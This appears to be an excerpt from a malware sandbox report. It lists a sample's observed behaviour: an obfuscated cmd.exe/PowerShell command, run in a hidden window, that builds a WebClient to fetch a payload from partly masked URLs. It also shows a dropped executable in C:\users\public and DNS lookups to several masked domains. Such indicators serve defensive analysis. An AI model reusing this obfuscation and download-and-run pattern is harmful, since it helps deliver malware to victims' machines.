Technical Information
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Afghani46='Research40';$internetsolution28=new-object Net.WebClient;$collaboration90='http://re#####herstrading.com/0ccRGilOI@http://www....
- C:\users\public\639.exe
- C:\users\public\639.exe
- DNS ASK re#####herstrading.com
- DNS ASK so##ftp.com
- DNS ASK et###izthai.com
- DNS ASK cu###useli.com
- DNS ASK wp.###elooknung.com
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Afghani46='Research40';$internetsolution28=new-object Net.WebClient;$collaboration90='http://re#####herstrading.com/0ccRGilOI@http://www....' (with hidden window)